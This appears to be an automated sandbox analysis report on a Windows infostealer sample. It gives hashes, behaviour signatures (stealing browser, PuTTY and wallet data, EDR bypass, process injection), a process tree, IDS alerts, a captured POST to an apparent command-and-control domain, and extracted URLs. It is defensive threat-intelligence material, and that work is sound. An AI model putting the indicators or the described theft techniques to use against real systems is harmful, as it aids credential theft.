Edit tour

Windows Analysis Report
24EPV9vjc5.exe

Overview

General Information

Sample name:	24EPV9vjc5.exe renamed because original name is a hash value
Original sample name:	c5056ac95a2002bc08cb0ec8dbf064f78dff400642ec1a6fc2a132984a7c1d99.exe
Analysis ID:	1586712
MD5:	ec4072e1ae2a9316270e6afd66235a97
SHA1:	ec499500172ca2cc76c5b30eca34fceb9bacce0d
SHA256:	c5056ac95a2002bc08cb0ec8dbf064f78dff400642ec1a6fc2a132984a7c1d99
Tags:	exeuser-crep1x
Infos:

Detection

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to clear windows event logs (to hide its activities)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

24EPV9vjc5.exe (PID: 7656 cmdline: "C:\Users\user\Desktop\24EPV9vjc5.exe" MD5: EC4072E1AE2A9316270E6AFD66235A97)

24EPV9vjc5.exe (PID: 7876 cmdline: "C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe" -burn.clean.room="C:\Users\user\Desktop\24EPV9vjc5.exe" -burn.filehandle.attached=676 -burn.filehandle.self=520 MD5: EC4072E1AE2A9316270E6AFD66235A97)

RescueCDBurner.exe (PID: 3276 cmdline: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)

RescueCDBurner.exe (PID: 6064 cmdline: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)

cmd.exe (PID: 5876 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

LocalCtrl_alpha_v3.exe (PID: 1076 cmdline: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)

msedge.exe (PID: 5024 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5500 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2060,i,18088822377575541774,13344456101487118209,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

RescueCDBurner.exe (PID: 1868 cmdline: "C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)

cmd.exe (PID: 2040 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

LocalCtrl_alpha_v3.exe (PID: 6996 cmdline: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)

msedge.exe (PID: 2836 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 3704 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2864 --field-trial-handle=2068,i,8123229788222533181,5144099982838419640,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5260 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6732 --field-trial-handle=2068,i,8123229788222533181,5144099982838419640,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 3324 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5356 --field-trial-handle=2068,i,8123229788222533181,5144099982838419640,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 4280 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceuserer --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7044 --field-trial-handle=2068,i,8123229788222533181,5144099982838419640,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T14:55:59.804719+0100	2028371	3	Unknown Traffic	192.168.2.10	49975	172.67.174.91	443	TCP
2025-01-09T14:56:01.532105+0100	2028371	3	Unknown Traffic	192.168.2.10	49976	172.67.174.91	443	TCP
2025-01-09T14:56:02.422967+0100	2028371	3	Unknown Traffic	192.168.2.10	49977	172.67.174.91	443	TCP
2025-01-09T14:56:30.575344+0100	2028371	3	Unknown Traffic	192.168.2.10	50086	172.67.174.91	443	TCP
2025-01-09T14:56:32.418264+0100	2028371	3	Unknown Traffic	192.168.2.10	50088	172.67.174.91	443	TCP
2025-01-09T14:56:32.928121+0100	2028371	3	Unknown Traffic	192.168.2.10	50089	172.67.174.91	443	TCP
2025-01-09T14:56:34.787021+0100	2028371	3	Unknown Traffic	192.168.2.10	50090	172.67.174.91	443	TCP
2025-01-09T14:56:35.718133+0100	2028371	3	Unknown Traffic	192.168.2.10	50091	172.67.174.91	443	TCP
2025-01-09T14:56:36.723330+0100	2028371	3	Unknown Traffic	192.168.2.10	50092	172.67.174.91	443	TCP
2025-01-09T14:56:38.135127+0100	2028371	3	Unknown Traffic	192.168.2.10	50093	172.67.174.91	443	TCP
2025-01-09T14:56:39.843130+0100	2028371	3	Unknown Traffic	192.168.2.10	50094	172.67.174.91	443	TCP
2025-01-09T14:56:41.311266+0100	2028371	3	Unknown Traffic	192.168.2.10	50095	172.67.174.91	443	TCP
2025-01-09T14:56:56.504303+0100	2028371	3	Unknown Traffic	192.168.2.10	50096	172.67.174.91	443	TCP
2025-01-09T14:56:58.283517+0100	2028371	3	Unknown Traffic	192.168.2.10	50097	172.67.174.91	443	TCP
2025-01-09T14:56:59.120214+0100	2028371	3	Unknown Traffic	192.168.2.10	50098	172.67.174.91	443	TCP
2025-01-09T14:57:00.009627+0100	2028371	3	Unknown Traffic	192.168.2.10	50099	172.67.174.91	443	TCP
2025-01-09T14:57:01.559866+0100	2028371	3	Unknown Traffic	192.168.2.10	50100	172.67.174.91	443	TCP
2025-01-09T14:57:03.322774+0100	2028371	3	Unknown Traffic	192.168.2.10	50101	172.67.174.91	443	TCP
2025-01-09T14:57:04.371072+0100	2028371	3	Unknown Traffic	192.168.2.10	50102	172.67.174.91	443	TCP

HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15Content-Length: 147Host: bamarelakij.site

Source: 24EPV9vjc5.exe	String found in binary or memory: http://appsyndication.org/2006/appsyn
Source: 24EPV9vjc5.exe, 00000000.00000000.1315066949.000000000010B000.00000002.00000001.01000000.00000003.sdmp, 24EPV9vjc5.exe, 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmp, 24EPV9vjc5.exe, 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmp, 24EPV9vjc5.exe, 00000002.00000000.1321845292.000000000069B000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://b.chenall.net/menu.lst
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://bug.reneelab.com
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003User
Source: RescueCDBurner.exe, RescueCDBurner.exe, 00000004.00000002.1433533431.000000006B4E9000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://bugreports.qt-project.org/
Source: RescueCDBurner.exe, 00000003.00000002.1372101532.000000006C6C9000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1433533431.000000006B4E9000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crt0
Source: RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0N
Source: RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://grub4dos.chenall.net/e/%u)
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://isecure-a.reneelab.com/webapi.php?code=
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://isecure.reneelab.com.cn/webapi.php?code=
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://isecure.reneelab.com.cn/webapi.php?code=http://isecure-a.reneelab.com/webapi.php?code=http://
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://isecure.reneelab.com/webapi.php?code=
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2288301207.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://msn.com
Source: RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0W
Source: RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: RescueCDBurner.exe, 00000004.00000002.1434547488.000000006BAEE000.00000002.00000001.01000000.00000014.sdmp	String found in binary or memory: http://qt.digia.com/
Source: RescueCDBurner.exe, 00000004.00000002.1434547488.000000006BAEE000.00000002.00000001.01000000.00000014.sdmp	String found in binary or memory: http://qt.digia.com/product/licensing
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: 24EPV9vjc5.exe, 00000000.00000002.1644612834.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, 24EPV9vjc5.exe, 00000000.00000003.1643931905.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mic
Source: RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://support.reneelab.com/anonymous_requests/new
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://support.reneelab.com/anonymous_requests/newstore/buy-renee-passnowentrare-nel-bios.htmlItalia
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
